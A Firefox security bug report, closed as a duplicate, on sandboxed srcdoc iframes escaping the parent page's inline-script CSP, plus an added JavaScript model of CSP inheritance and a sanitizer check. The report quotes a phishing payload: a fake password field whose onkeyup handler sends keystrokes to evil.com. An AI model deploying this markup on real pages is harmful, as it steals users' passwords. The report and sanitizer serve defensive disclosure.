Bug 1315952 (Closed). Opened 8 years ago; closed 8 years ago.
iframe sandbox with srcdoc bypasses inline script restriction from parent document CSP
Categories: Core :: DOM: Security, defect
Tracking: RESOLVED DUPLICATE of bug 1073952
People: Reporter: freddy, Unassigned
Details: Keywords: sec-moderate
Sent to me by Mario Heiderich (CCd):
> <iframe style='background:#F5F5F5;position:absolute;top:0;left:0;height:100%;width:100%;border:0' sandbox='allow-scripts' srcdoc='<h1>Please Enter Your Password</h1><input onkeyup=fetch("https://evil.com/?pass= "+this.value)>'>
This is only half a CSP bypass. The sandbox attribute is required to "lose" the outer document's CSP and thus execute scripts. But this also means that the srcdoc iframe cannot access the top level content. Still dangerous for phishing and such.
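An added example, not part of the bug report: a small JavaScript model of the behaviour the report expects (a srcdoc document inherits its embedding document's CSP, and the sandbox attribute only adds restrictions, never removes that inherited policy), plus a check an HTML sanitizer could use to flag sandboxed srcdoc iframes in untrusted markup. The iframe objects and policy strings are constructed inputs; the function names are this example's own.

```javascript
// Parse a serialized CSP value into a Map of directive name -> source list.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

// True when the policy lets inline event handlers and inline <script> run.
// A nonce or hash source makes 'unsafe-inline' ignored (CSP2 and later), so
// unnonced inline code runs only under a bare 'unsafe-inline', or when no
// script-src / default-src directive restricts scripts at all.
function allowsInlineScript(policy) {
  const d = parseCsp(policy);
  const sources = d.get('script-src') ?? d.get('default-src');
  if (!sources) return true;
  const hasNonceOrHash = sources.some(s => /^'(nonce-|sha(256|384|512)-)/i.test(s));
  return sources.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// The CSP a srcdoc iframe's document must enforce: the parent's policy,
// inherited verbatim. The sandbox attribute plays no part in this decision;
// it can only restrict the document further. Returns null for non-srcdoc frames,
// which load their own policy with their own response.
function effectiveSrcdocCsp(parentCsp, iframe) {
  if (!('srcdoc' in iframe)) return null;
  return parentCsp;
}

// Sanitizer-side check for untrusted HTML: an iframe that carries srcdoc and a
// sandbox token list containing allow-scripts is the shape this bug concerns,
// so a filter for user-supplied markup can reject or strip it.
function flagsRiskyIframe(iframe) {
  const sandbox = iframe.sandbox ?? null;
  if (!('srcdoc' in iframe) || sandbox === null) return false;
  return sandbox.split(/\s+/).includes('allow-scripts');
}
```

Under a nonce-based parent policy such as `script-src 'nonce-abc'`, the inherited policy leaves no inline handler runnable inside the srcdoc document, sandboxed or not.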
Updated 8 years ago: Group: core-security → dom-core-security
Updated 8 years ago: Status: NEW → RESOLVED; Closed: 8 years ago; Resolution: --- → DUPLICATE
Updated 8 years ago: Group: dom-core-security